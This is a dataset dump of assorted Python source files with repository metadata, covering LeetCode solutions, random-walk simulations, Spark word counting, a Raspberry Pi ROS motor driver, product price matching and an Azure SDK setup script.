blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 5
283
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
41
| license_type
stringclasses 2
values | repo_name
stringlengths 7
96
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 58
values | visit_date
timestamp[us] | revision_date
timestamp[us] | committer_date
timestamp[us] | github_id
int64 12.7k
662M
⌀ | star_events_count
int64 0
35.5k
| fork_events_count
int64 0
20.6k
| gha_license_id
stringclasses 11
values | gha_event_created_at
timestamp[us] | gha_created_at
timestamp[us] | gha_language
stringclasses 43
values | src_encoding
stringclasses 9
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 7
5.88M
| extension
stringclasses 30
values | content
stringlengths 7
5.88M
| authors
sequencelengths 1
1
| author
stringlengths 0
73
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
3e307d287b62bc1365c9f84b092ce3f6e3f832fb | f370072d7d07681654d4a8c06b23e6508af5679c | /untitled1.py | ce7a8aabe886fbfd4e2e10628e197dab9749f4b8 | [] | no_license | Thitsugaya1/python | 58268f3544907db3e03a06d57119437ba942bc2e | 6de59c4c576d73e8552e3bd6a74ab49fda140097 | refs/heads/master | 2021-07-15T17:46:54.608543 | 2020-07-31T17:09:43 | 2020-07-31T17:09:43 | 194,190,801 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 392 | py | # -*- coding: utf-8 -*-
"""
Created on Tue Apr 01 19:47:47 2014
@author: Toshiron
"""
Cantidad_horas = float(raw_input("cantidad de horas: "))
Cantidad_anios = float(raw_input("Edad: "))
Total_Horas = Cantidad_anios*8760
Hd = 24/Cantidad_horas
Ho_dormidas = Total_Horas/Hd
Di_dormidos = Ho_dormidas/24
Year_d = Di_dormidos/365
print Year_d, "anios que ah dormido en su vida"
| [
"[email protected]"
] | |
8b89c3071d264d6ae693fe10fbb5a8f56502f10a | e51c97a79a09c3a73fb0ab7f16a9ba670538af84 | /src/vertexarea.py | 59729b0953f18ffed7ca0ec8a08aeb8291bad172 | [] | no_license | zehdeh/spheremeasurements | 90a8f49819343c2da0726f2b6f3e3a8f6d4113f3 | 6e2c6825d63553ac0c53641939aa87bbb7c432ad | refs/heads/master | 2020-05-21T14:59:10.918506 | 2017-01-13T17:08:31 | 2017-01-13T17:08:31 | 64,773,580 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 832 | py | import numpy as np
import math
from timeit import default_timer as timer
def getFaceAngles(face, vertices):
v = vertices[face]
a = np.linalg.norm(v[0] - v[1])
b = np.linalg.norm(v[1] - v[2])
c = np.linalg.norm(v[2] - v[0])
B = math.acos((a**2 + c**2 - b**2) / (2*a*c))
C = math.asin((c*math.sin(B))/b)
A = np.pi - B - C
return A,B,C
def getFaceArea(face, vertices):
v = vertices[face]
a = np.linalg.norm(v[0] - v[1])
b = np.linalg.norm(v[1] - v[2])
c = np.linalg.norm(v[2] - v[0])
t = [a,b,c]
s = np.sum(t)/2
return np.sqrt(s*np.prod(s-t))
def getVertexAreas(faces, vertices):
faceAreas = np.array([getFaceArea(f, vertices) for f in faces])/3
vertexAreas = np.array([np.sum(faceAreas[np.argwhere(np.any(np.reshape(i == faces.ravel(), (-1,3)), axis=1))]) for i,v in enumerate(vertices)])
return vertexAreas
| [
"[email protected]"
] | |
b277bc417e82dc0347d75608d8b8bad5d11f6ae8 | ba69a96366b7b6801feac5e8716443331838662b | /easy/RemoveElement.py | 14b77e25687554aea201b298b86477e2ef57c3b3 | [] | no_license | gx20161012/leetcode | 8e3e99aecb824668e54652d608bca2137d5d47fe | 2765e846c804caf17472fe548e4246b6eff63966 | refs/heads/master | 2021-07-29T20:01:21.059713 | 2021-07-28T15:45:05 | 2021-07-28T15:45:05 | 147,936,993 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 363 | py | class Solution:
def removeElement(self, nums, val):
"""
:type nums: List[int]
:type val: int
:rtype: int
"""
count = nums.count(val)
for i in range(count):
nums.remove(val)
return len(nums)
s = Solution()
nums = [0,1,2,2,3,0,4,2]
val = 2
print(s.removeElement(nums, val))
print(nums) | [
"[email protected]"
] | |
4cc08112be4d4b74e844373295dfe2d29f3ee2a7 | 8804e0fa548726a8683ddececa90c3d789b58a13 | /quick_tut/basic_control.py | 48facec6d17dd71eda5eb7cc44469b869d6e9b23 | [] | no_license | thienkyo/pycoding | aeea0693c99598cd7204e0afa2d4bad7f2805078 | c915dc6adc4b2d2ff17e59e9da35cf5a220508dc | refs/heads/master | 2021-01-12T08:20:05.063961 | 2016-12-14T05:47:02 | 2016-12-14T05:47:02 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 820 | py | # If
grade = 9
if grade >= 9:
print('Awesome')
elif grade >= 7:
print('Good')
elif grade >= 5:
print('Not bad')
else:
print('No way')
# Logical operator
if 10 > 5 or 10 < 2:
print('true')
if 10 > 5 and 10 > 2:
print('true')
if not 10 < 2:
print('true')
# For loop
for num in [1, 2, 3]:
print(num)
for num in range(1, 3):
print(num)
cats = ['Tom', 'Jerry', 'Cat']
for idx, val in enumerate(cats):
print(idx, val)
# While
i = 0
while i < 10:
print('Iteration:', i)
i = i + 1
# Intervention
for item in [1, 2, 3, 4]:
if item == 3:
break # Stop Loop if see 3
print(item)
for item in [1, 2, 3, 4]:
if item == 3: # Do nothing if see 3, continue the loop
continue
print(item)
for i in range(1, 10):
pass # Do nothing statement.
| [
"[email protected]"
] | |
884621be26ade33f8eb4183988131399d396086b | e28ad0328a7c44573b90b613650dcdf80a99991a | /Examples/for.py | ccd20002a614e78500f5b8ed0418ebe95d7e70e4 | [] | no_license | ryankennedy712/Python | 34f3fbcff5e6b474877f08936ac746828ed03ff1 | 9282008ef949e7215d5e9bb0c948164b306a7b3b | refs/heads/master | 2020-06-11T00:14:33.494819 | 2020-03-02T00:46:59 | 2020-03-02T00:46:59 | 193,801,252 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 289 | py | #for loop
#for loops are annoying to get a hang of.
#they are more advanced while loops
#range() allows you to generate a temporary list of numbers given what you enter
#the first number is the start, the second number is the end but wont be included.
for x in range(1,10):
print(x)
| [
"[email protected]"
] | |
d1fc228680184699671cc79a504fe1cc836c0403 | b6efe59f3117da81a76ac634f010fd1feaeef25c | /api/make_file.py | 09e277a20223f11016c8ffc78ee3d6c3dbda55f8 | [] | no_license | kaktusss123/goods_parsing | b53e342710a1dd8d69b92d2a5f2ca9ef39e05385 | b0700e067103c2410e40331fab6ab7d449271a2b | refs/heads/master | 2021-01-08T02:38:36.686227 | 2020-02-20T13:13:44 | 2020-02-20T13:13:44 | 241,887,323 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,794 | py | import pandas as pd
from functools import reduce
from preprocess import preprocess, Status
from json import load
def match(args):
operations = [
lambda x, y: x['match_2'] == y['match_2'],
lambda x, y: x['match_3'] == y['match_3'],
lambda x, y: ''.join(x['brand'].lower().split()) ==
''.join(y['brand'].lower().split()),
lambda x, y: x['egg_cat'] == y['egg_cat'],
lambda x, y: x['yogurt'] == y['yogurt'],
lambda x, y: x['milk'] == y['milk'],
lambda x, y: x['butter'] == y['butter']
]
cols = [(f'{args[1][0]}_{i}', f'price_{i}') for i in range(10)]
cols = [f'{args[0][0]}', f'{args[0][0]}_price'] + \
[item for sublist in cols for item in sublist]
res = pd.DataFrame(columns=cols)
items = {}
for arg in args:
with open(f'items/{arg[1]}', encoding='utf-8') as f:
items[arg[0]] = list(
map(preprocess, map(lambda x: x.get('data') or x['value']['data'], load(f))))
items[arg[0]] = list(map(lambda x: x[0], filter(
lambda x: x[1] == Status.OK, items[arg[0]])))
if 'price_sub' in items[arg[0]][0]:
for rec in items[arg[0]]:
rec['price_main'] += rec['price_sub'] / 100
banned_g, banned_u = set(), set()
for g in items[args[0][0]]:
matched = []
if not g['brand']:
continue
for u in items[args[1][0]]:
if not u['brand']:
continue
if all([func(g, u) for func in operations]):
banned_u.add(u['product_name'])
matched.extend([u['product_name'], u['price_main']])
if matched:
banned_g.add(g['product_name'])
matched = [g['product_name'], g['price_main']] + matched
res = res.append(dict(zip(cols, matched)), ignore_index=True)
unbanned_g = pd.DataFrame(columns=['Наименование', 'Цена'])
unbanned_u = pd.DataFrame(columns=['Наименование', 'Цена'])
for g in items[args[0][0]]:
if g['product_name'] not in banned_g:
unbanned_g = unbanned_g.append(
{'Наименование': g['product_name'], 'Цена': g['price_main']}, ignore_index=True)
for g in items[args[1][0]]:
if g['product_name'] not in banned_u:
unbanned_u = unbanned_u.append(
{'Наименование': g['product_name'], 'Цена': g['price_main']}, ignore_index=True)
### Statistics ###
stat = pd.DataFrame(
columns=['source', 'full', 'matched', 'match_pct'])
stat = stat.append({'source': args[0][0], 'full': len(items[args[0][0]]), 'matched': len(
res), 'match_pct': f'{len(res) / len(items[args[0][0]]) * 100:.2f}%'}, ignore_index=True)
stat = stat.append({'source': args[1][0], 'full': len(items[args[1][0]]), 'matched': len(
res), 'match_pct': f'{len(res) / len(items[args[1][0]]) * 100:.2f}%'}, ignore_index=True)
return res, unbanned_g, unbanned_u, stat
ut, gl, pe = ('utkonos', 'utkonos.json'), ('globus',
'globus.json'), ('perekrestok', 'PEREKR_item_2.json')
# ut, gl, pe = ('globus', 'globus.json'), ('globus_tver',
# 'globus_tver.json'), ('globus_ryazan', 'globus_ryazan.json')
for e in ((ut, pe), (gl, pe), (gl, ut)):
m, g, u, stat = match(e)
with pd.ExcelWriter(f'result_{e[0][0]}_{e[1][0]}.xlsx') as writer:
m.to_excel(writer, index=False, sheet_name='Совпадение')
g.to_excel(writer, index=False, sheet_name=e[0][0])
u.to_excel(writer, index=False, sheet_name=e[1][0])
stat.to_excel(writer, index=False, sheet_name='Статистика')
| [
"PaRoLoK123"
] | PaRoLoK123 |
427f98bf697d88d38a96995808a89004588dba24 | a84164d6298da8788f32451bb1a876670741c533 | /mountains/apps.py | 22e1c20e670b9e48fcab310be9f49044c049a186 | [
"MIT"
] | permissive | marcelotokarnia/mountain-catalog | 0e717a5cf78c422afa60c906816067344787824e | 8d5b9591e6b24ab7305016e1df41b0dc6e933388 | refs/heads/master | 2023-03-04T20:10:07.944709 | 2022-04-11T21:24:43 | 2022-04-11T21:24:43 | 134,347,237 | 1 | 0 | MIT | 2023-03-01T23:18:07 | 2018-05-22T02:05:21 | Python | UTF-8 | Python | false | false | 93 | py | from django.apps import AppConfig
class MountainsConfig(AppConfig):
name = 'mountains'
| [
"[email protected]"
] | |
52eeb1962ffc2f1522775ef4204b087658e06a7a | 3039e5a569ffb26ad9b3efc9b3f8f142a79ebac9 | /RaspberryPi/catkin_ws/src/rpimotor/src/drive.py.orig | 7a27d32e015652d966bc07e52c312100f8bb2f03 | [] | no_license | lbaitemple/newcar | 91eb958cb50d9490b73e0d49326b47d0453e29c3 | ed834f2fb954bf1d0fc35a1bcb613ce634040486 | refs/heads/master | 2020-03-27T00:12:01.043533 | 2019-04-17T18:59:09 | 2019-04-17T18:59:09 | 145,603,131 | 2 | 1 | null | 2019-03-30T20:15:23 | 2018-08-21T18:23:59 | C++ | UTF-8 | Python | false | false | 2,649 | orig | #!/usr/bin/env python
import sys, tty, termios, time, rospy
import RPi.GPIO as GPIO
from std_msgs.msg import String
from std_msgs.msg import Bool
from std_msgs.msg import Empty
from std_msgs.msg import Int32
from race.msg import drive_param
str_msg = Int32()
flagStop = False
#pwm_center = 15
#pwm_lowerlimit = 10
#pwm_upperlimit = 20
#prev_v=14
def getch():
fd = sys.stdin.fileno()
old_settings = termios.tcgetattr(fd)
try:
tty.setraw(sys.stdin.fileno())
ch = sys.stdin.read(1)
finally:
termios.tcsetattr(fd, termios.TCSADRAIN, old_settings)
return ch
def messageDrive(pwm):
global prev_v
if(flagStop == False):
rospy.loginfo("speed: %f, prev speed %d", pwm.velocity, prev_v)
v = (int) (pwm.velocity * 5 + pwm_center)
if (v>pwm_center and prev_v<pwm_center):
m.ChangeDutyCycle(pwm_center)
elif(v<pwm_center and prev_v>pwm_center):
m.ChangeDutyCycle(pwm_center)
prev_v=v
if(v < pwm_lowerlimit):
m.ChangeDutyCycle(pwm_lowerlimit)
elif(v > pwm_upperlimit):
m.ChangeDutyCycle(pwm_upperlimit)
else:
m.ChangeDutyCycle(v)
a = pwm.angle * 5 + pwm_center
if(a < pwm_lowerlimit):
s.ChangeDutyCycle(pwm_lowerlimit)
elif(a > pwm_upperlimit):
s.ChangeDutyCycle(pwm_upperlimit)
else:
s.ChangeDutyCycle(a)
else:
m.ChangeDutyCycle(pwm_center)
s.ChangeDutyCycle(pwm_center)
def messageEmergencyStop(flag):
flagStop = flag.data
if(flagStop == true):
m.ChangeDutyCycle(pwm_center)
s.ChangeDutyCycle(pwm_center)
def listener():
rospy.init_node('listener', anonymous=True)
rospy.Subscriber("drive_parameters", drive_param, messageDrive)
rospy.Subscriber("eStop", Bool, messageEmergencyStop)
rospy.spin()
if __name__ == '__main__':
global pwm_center
global pwm_lowerlimit
global pwm_upperlimit
global prev_v
pwm_center = 15
pwm_lowerlimit = 10
pwm_upperlimit = 20
prev_v=14
GPIO.setmode(GPIO.BOARD)
sport=rospy.get_param('~steer_port', 33)
mport=rospy.get_param('~motor_port', 12)
freq=rospy.get_param('~frequency', 100)
shift=rospy.get_param('~shift', 0)
GPIO.setup(sport, GPIO.OUT)
GPIO.setup(mport, GPIO.OUT)
s = GPIO.PWM(sport, freq) # channel=12 frequency=100Hz
m = GPIO.PWM(mport, freq)
center=pwm_center+shift
pwm_lowerlimit=pwm_lowerlimit+shift
pwm_center = pwm_center+shift
pwm_upperlimit = pwm_upperlimit +shift
s.start(center)
m.start(center)
print "ROS stuff initializing"
listener()
s.ChangeDutyCycle(center)
s.stop()
m.stop()
GPIO.cleanup()
| [
"[email protected]"
] | |
c74a1642bf69ff8e2f66383bd39c36cd3f74607a | c21be7fd13f55ccf884271f69314d508596047c8 | /locallibrary/locallibrary/catalog/migrations/0002_auto_20180706_1228.py | 7567ff4c0547775c6d64cfb3f0ee1115d5257abe | [] | no_license | khanguslee/django-spike | 1305fb36593651a9127f7dfaefa893217706af00 | 8656b7e9f860e2a532c8513c9161a0a768866daf | refs/heads/master | 2020-03-18T21:47:46.905558 | 2018-07-18T16:23:06 | 2018-07-18T16:23:06 | 135,303,740 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 366 | py | # Generated by Django 2.0.7 on 2018-07-06 02:28
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('catalog', '0001_initial'),
]
operations = [
migrations.RenameField(
model_name='author',
old_name='data_of_birth',
new_name='date_of_birth',
),
]
| [
"[email protected]"
] | |
c865b1ad43647c13c16878af99bfb0a29466ab5f | 266e641b716f7f13c592234f63fa5a57c1370cff | /Termo Simulations with GUI/pywalker/polar_grid_walk.py | cf164c3ef75db95e1a58e39301d6cd8bd5fa0f5d | [] | no_license | kadirberatyildirim/Some-Small-Projects | 68468d21e6f3a259925281b5494ea403b9d66091 | 9946597990c63f15f0af2d89d6eda94525c486fa | refs/heads/master | 2023-08-30T08:20:37.476328 | 2021-11-18T12:58:50 | 2021-11-18T12:58:50 | 250,818,052 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,609 | py | """
TO DO!
"""
import numpy as np
class random_walk_2d():
def __init__(self, steps, init_pos = (0, 0), step_size = 1):
self.steps = steps
self.path = [init_pos]
self.step_size = step_size
self.allowed_steps = ['+r', '-r', '+theta', '-theta']
self.occurences = []
self.walk()
def walk(self):
for i in range(self.steps):
self.path.append(self.calc_next())
self.path = np.array(self.path)
self.occurences = self.calc_occurences()
def calc_next(self):
cur_step = np.random.choice(self.allowed_steps)
if cur_step == '+r': next_pos = (self.path[-1][0] + self.step_size, self.path[-1][1])
elif cur_step == '-r': next_pos = (self.path[-1][0] - self.step_size, self.path[-1][1])
elif cur_step == '+theta': next_pos = (self.path[-1][0], self.path[-1][1] + self.step_size)
elif cur_step == '-theta': next_pos = (self.path[-1][0], self.path[-1][1] - self.step_size)
return next_pos
def path_to_pandas(self):
import pandas as pd
return pd.DataFrame(self.path, columns = ['x', 'y'])
def plot_path(self):
import matplotlib.pyplot as plt
plt.polar(self.path[:, 1], self.path[:, 0], xunits = 'degrees')
plt.title('2D Random Walk with {} Steps'.format(self.steps))
plt.show()
def calc_occurences(self):
unique = range(np.min(self.path), np.max(self.path))
counts = np.array([np.count_nonzero(self.path == i, axis = 0)
for i in unique])
return np.concatenate((np.array([unique]).T, counts), axis = 1)
def occurences_to_pandas(self):
import pandas as pd
return pd.DataFrame(self.occurences, columns = ['values', 'x_count', 'y_count'])
def plot_occurences(self):
import matplotlib.pyplot as plt
plt.plot(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
plt.plot(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
plt.legend()
plt.title('Occurences')
plt.xlabel('Unique values')
plt.ylabel('Counts')
plt.show()
def barplot_occurences(self):
import matplotlib.pyplot as plt
plt.bar(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
plt.bar(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
plt.legend()
plt.title('Occurences')
plt.xlabel('Unique values')
plt.ylabel('Counts')
plt.show()
class random_walk_3d():
def __init__(self, steps, init_pos = (0, 0, 0)):
self.steps = steps
self.path = [init_pos]
self.allowed_steps = ['+x', '-x', '+y', '-y', '+z', '-z']
self.occurences = []
self.walk()
def walk(self):
for i in range(self.steps):
self.path.append(self.calc_next())
self.path = np.array(self.path)
self.occurences = self.calc_occurences()
def calc_next(self):
cur_step = np.random.choice(self.allowed_steps)
if cur_step == '+x':
next_pos = (self.path[-1][0] + 1, self.path[-1][1], self.path[-1][2])
elif cur_step == '-x':
next_pos = (self.path[-1][0] - 1, self.path[-1][1], self.path[-1][2])
elif cur_step == '+y':
next_pos = (self.path[-1][0], self.path[-1][1] + 1, self.path[-1][2])
elif cur_step == '-y':
next_pos = (self.path[-1][0], self.path[-1][1] - 1, self.path[-1][2])
elif cur_step == '+z':
next_pos = (self.path[-1][0], self.path[-1][1], self.path[-1][2] + 1)
elif cur_step == '-z':
next_pos = (self.path[-1][0], self.path[-1][1], self.path[-1][2] - 1)
return next_pos
def path_to_pandas(self):
import pandas as pd
return pd.DataFrame(self.path, columns = ['x', 'y', 'z'])
def plot_path(self):
import matplotlib.pyplot as plt
from mpl_toolkits.mplot3d import Axes3D
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
ax.plot(self.path[:, 0], self.path[:, 1], self.path[:, 2])
plt.title('3D Random Walk with {} Steps'.format(self.steps))
plt.show()
def calc_occurences(self):
unique = range(np.min(self.path), np.max(self.path))
counts = np.array([np.count_nonzero(self.path == i, axis = 0)
for i in unique])
return np.concatenate((np.array([unique]).T, counts), axis = 1)
def occurences_to_pandas(self):
import pandas as pd
return pd.DataFrame(self.occurences, columns = ['values', 'x_count', 'y_count'])
def plot_occurences(self):
import matplotlib.pyplot as plt
plt.plot(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
plt.plot(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
plt.plot(self.occurences[:, 0], self.occurences[:, 3], label = 'z count')
plt.legend()
plt.title('Occurences')
plt.xlabel('Unique values')
plt.ylabel('Counts')
plt.show()
def barplot_occurences(self):
import matplotlib.pyplot as plt
plt.bar(self.occurences[:, 0], self.occurences[:, 1], label = 'x count')
plt.bar(self.occurences[:, 0], self.occurences[:, 2], label = 'y count')
plt.bar(self.occurences[:, 0], self.occurences[:, 3], label = 'z count')
plt.legend()
plt.title('Occurences')
plt.xlabel('Unique values')
plt.ylabel('Counts')
plt.show()
| [
"[email protected]"
] | |
fdbbd3c5a74e3bde1633775550ed3c99e90b4f4b | a7063e41600a0faa85881f9a549c3e6ee84c9627 | /AWS_EMR_count_q1-1_reduce_combine.py | c655a30d713224f080b05260ada26dc52c7bfeb8 | [] | no_license | Frankie-Spencer/AWS_EMR_CC2020 | 30a8897cc83f18addb58bc870727bd2f1b662732 | a9a909b1ece32b0092c4308caae7dff85b380a27 | refs/heads/master | 2022-06-25T19:05:45.454977 | 2020-05-12T10:17:22 | 2020-05-12T10:17:22 | 263,301,275 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,429 | py | import sys
from pyspark import SparkContext, HiveContext
sc = SparkContext()
sqlContext = HiveContext(sc)
# system input arguments needed
# e. g /dir/text.txt /dir/out 100 'reduce'
args = sys.argv
source_path, out_path, amount, process_type = args[1], args[2], args[3], args[4]
# declare removable items
# -empty strings and which could be created when splitting
# -None values as created if the word doesn't include alphabet
remove_items = sc.parallelize([(None, None)])
# import input file, and set use_unicode to True to recognise Finnish letters
input_file = sc.textFile(source_path, use_unicode=True)
# read all text in the file, split string by space (' ')
# isolate all words as key, value pair, recode none alphabetic as None
# delete above declared items as remove_items
# increment value of the item as they appear on the whole set using reduceByKey function
if process_type == 'reduce':
word_count = input_file.flatMap(lambda line: line.split(' '))\
.map(lambda word: [word if any(s.isalpha() for s in word) else None, 1])\
.subtractByKey(remove_items)\
.reduceByKey(lambda a, b: a + b)
# increment value of the item as they appear on the whole set using combineByKey function
elif process_type == 'combine':
word_count = input_file.flatMap(lambda line: line.split(' ')) \
.map(lambda word: [word if any(s.isalpha() for s in word) else None, 1]) \
.subtractByKey(remove_items) \
.combineByKey(lambda v: v,
lambda c, v: c + v,
lambda c1, c2: c1 + c2)
# make a function to correct invalid inputs to be equal to total entries
# and users can enter 0 if they want full list, as its usually the standard
def output_amount(n):
try:
num = int(n)
if num <= 0:
return word_count.count()
else:
return num
except:
return word_count.count()
# order by value descending and get only given value by argument
word_count_limit_sorted = word_count.takeOrdered(output_amount(amount), key=lambda x: -x[1])
# merge all data into single rdd
final_output = sc.parallelize(word_count_limit_sorted)\
.coalesce(1)
# write to text file
final_output.saveAsTextFile(out_path)
# stop Spark
sc.stop()
| [
"[email protected]"
] | |
f266e0d0170f262603ee62eb65a42971b55eace2 | 8048df61aa0d739dcc4d3d1315e2e2b807ff8b4b | /Sorting methods/bubble sort.py | c8d577d0ffc695db0d664fb83c00d7525e5c050a | [] | no_license | Aniangelsuperbat1/Algorithms | 3e1097292edc6471e898550456ee38c7f2b7f0a2 | 6c2b853c5e1a8d86176659cf38fe2a845dd91186 | refs/heads/master | 2023-01-23T22:14:09.717974 | 2020-12-06T22:18:49 | 2020-12-06T22:18:49 | 314,376,463 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 527 | py | # Takes an un ordered list and sorts them in ascending value
# Compares two values at any given time.
# loops through lists and sorts it
# o(n*2)
def bubble_sort(list_a):
indexing_length = len(list_a) - 1
sorted = False
while not sorted:
sorted = True
for i in range(0, indexing_length):
if list_a[i] > list_a[i+1]:
sorted = False
list_a[i], list_a[i+1] = list_a[i+1], list_a[i]
return list_a
print(bubble_sort([1,3,565,4543,434,767,67897,87,34])) | [
"[email protected]"
] | |
740e1452267d94475b889877c0ab43214417c4d9 | 7c870e0f5951becc0242eb664b855e1404246e16 | /LeetCode/76.最小覆盖子串.py | e5e4a44bd156d83322bfaac4a010f1b809883477 | [] | no_license | kobe24167/Study | 73a0dddfee4e9067c6a49d2a218f5d57086a4bd7 | 8d85d746b9e0882bfb40ada208b689178bc8f3d8 | refs/heads/master | 2022-12-24T18:28:19.129921 | 2021-06-29T01:52:21 | 2021-06-29T01:52:21 | 161,650,160 | 2 | 0 | null | 2022-12-16T09:57:04 | 2018-12-13T14:24:40 | JavaScript | UTF-8 | Python | false | false | 1,463 | py | #
# @lc app=leetcode.cn id=76 lang=python3
#
# [76] 最小覆盖子串
#
# https://leetcode-cn.com/problems/minimum-window-substring/description/
#
# algorithms
# Hard (36.06%)
# Likes: 240
# Dislikes: 0
# Total Accepted: 13.9K
# Total Submissions: 40K
# Testcase Example: '"ADOBECODEBANC"\n"ABC"'
#
# 给你一个字符串 S、一个字符串 T,请在字符串 S 里面找出:包含 T 所有字母的最小子串。
#
# 示例:
#
# 输入: S = "ADOBECODEBANC", T = "ABC"
# 输出: "BANC"
#
# 说明:
#
#
# 如果 S 中不存这样的子串,则返回空字符串 ""。
# 如果 S 中存在这样的子串,我们保证它是唯一的答案。
#
#
#
# @lc code=start
class Solution:
def minWindow(self, s: str, t: str) -> str:
from collections import defaultdict
lookup = defaultdict(int)
for c in t:
lookup[c] += 1
start = 0
end = 0
min_len = float("inf")
counter = len(t)
res = ""
while end < len(s):
if lookup[s[end]] > 0:
counter -= 1
lookup[s[end]] -= 1
end += 1
while counter == 0:
if min_len > end - start:
min_len = end - start
res = s[start:end]
if lookup[s[start]] == 0:
counter += 1
lookup[s[start]] += 1
start += 1
return res
# @lc code=end
| [
"[email protected]"
] | |
8e9aecb12e6e5e2f8c0bc687ca323a81ccf17b40 | 4935e2ef7994222178f950319f9f8d3e2adfa543 | /summer/2018_07_26/4sum-ii.py | 93f49d2327c742fa53619df9e5a30f374a233dd2 | [] | no_license | shaheming/leecode | e853b59469b97ca97a5b4ecd80497b3dac3fb10f | a8b59573dc201438ebd5a5ab64e9ac61255a4abd | refs/heads/master | 2021-07-03T03:57:22.718410 | 2019-04-06T18:19:53 | 2019-04-06T18:19:53 | 140,241,375 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 689 | py | #这个问题本来是一个 O(N^4) 但是通过拆解可以拆解为两个 O(2*N^2) 的问题
class Solution:
def fourSumCount(self, A, B, C, D):
"""
:type A: List[int]
:type B: List[int]
:type C: List[int]
:type D: List[int]
:rtype: int
"""
count = 0
dicA, dicB, dicC, dicD = {}, {}, {}, {}
for a in A:
for b in B:
if a + b in dicA:
dicA[a + b] += 1
else:
dicA[a + b] = 1
for c in C:
for d in D:
if -(c + d) in dicA:
count += dicA[-(c + d)]
return count
| [
"[email protected]"
] | |
4d7505d380777b2beba7bed17181483a5992b5c4 | da9b9f75a693d17102be45b88efc212ca6da4085 | /sdk/appconfiguration/azure-appconfiguration/setup.py | cbab0ebedf6658d7f5da30366ae1070a9eca46c9 | [
"MIT",
"LicenseRef-scancode-generic-cla"
] | permissive | elraikhm/azure-sdk-for-python | e1f57b2b4d8cc196fb04eb83d81022f50ff63db7 | dcb6fdd18b0d8e0f1d7b34fdf82b27a90ee8eafc | refs/heads/master | 2021-06-21T22:01:37.063647 | 2021-05-21T23:43:56 | 2021-05-21T23:43:56 | 216,855,069 | 0 | 0 | MIT | 2019-10-22T16:05:03 | 2019-10-22T16:05:02 | null | UTF-8 | Python | false | false | 3,251 | py | #!/usr/bin/env python
#-------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#--------------------------------------------------------------------------
import sys
import re
import os.path
from io import open
from setuptools import find_packages, setup
# Change the PACKAGE_NAME only to change folder and different name
PACKAGE_NAME = "azure-appconfiguration"
PACKAGE_PPRINT_NAME = "App Configuration Data"
# a-b-c => a/b/c
package_folder_path = PACKAGE_NAME.replace('-', '/')
# a-b-c => a.b.c
namespace_name = PACKAGE_NAME.replace('-', '.')
# azure v0.x is not compatible with this package
# azure v0.x used to have a __version__ attribute (newer versions don't)
try:
import azure
try:
ver = azure.__version__
raise Exception(
'This package is incompatible with azure=={}. '.format(ver) +
'Uninstall it with "pip uninstall azure".'
)
except AttributeError:
pass
except ImportError:
pass
# Version extraction inspired from 'requests'
with open(os.path.join(package_folder_path, '_version.py'), 'r') as fd:
version = re.search(r'^VERSION\s*=\s*[\'"]([^\'"]*)[\'"]',
fd.read(), re.MULTILINE).group(1)
if not version:
raise RuntimeError('Cannot find version information')
with open('README.md', encoding='utf-8') as f:
readme = f.read()
with open('HISTORY.md', encoding='utf-8') as f:
history = f.read()
exclude_packages = [
'tests',
'samples',
# Exclude packages that will be covered by PEP420 or nspkg
'azure',
]
if sys.version_info < (3, 5, 3):
exclude_packages.extend([
'*.aio',
'*.aio.*'
])
setup(
name=PACKAGE_NAME,
version=version,
description='Microsoft {} Library for Python'.format(PACKAGE_PPRINT_NAME),
long_description=readme + '\n\n' + history,
long_description_content_type='text/markdown',
license='MIT License',
author='Microsoft Corporation',
author_email='[email protected]',
url='https://github.com/Azure/azure-sdk-for-python/tree/master/sdk/appconfiguration/azure-appconfiguration',
classifiers=[
'Development Status :: 3 - Alpha',
'Programming Language :: Python',
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
'Programming Language :: Python :: 3.7',
'Programming Language :: Python :: 3.8',
'License :: OSI Approved :: MIT License',
],
zip_safe=False,
packages=find_packages(exclude=exclude_packages),
install_requires=[
"msrest>=0.6.10",
"azure-core<2.0.0,>=1.0.0b5",
],
extras_require={
":python_version<'3.0'": ['azure-nspkg'],
":python_version<'3.4'": ['enum34>=1.0.4'],
":python_version<'3.5'": ['typing'],
"async:python_version>='3.5'": [
'aiohttp>=3.0',
'aiodns>=2.0'
],
}
) | [
"[email protected]"
] | |
f05dbdfaed6829910b7b2a59590a20e33ca3f67a | de3508314b95b8dff009c186c446f78c6e29458d | /crwlremoveirrelevant.py | 1f562f0fb719036ae33c375510e5704be3309f6f | [] | no_license | GithubPriya/Ache-Crawler | d5d336315ecf3b475e18cb45497d9ac4926f7ed9 | 6c7f06f0cbddb7301bba911f6847ca2ad284e9da | refs/heads/master | 2021-05-08T08:00:03.582890 | 2017-10-16T02:53:26 | 2017-10-16T02:53:26 | 106,982,212 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 316 | py | '''
Created on Sep 11, 2017
@author: admin_home
'''
import os
import glob
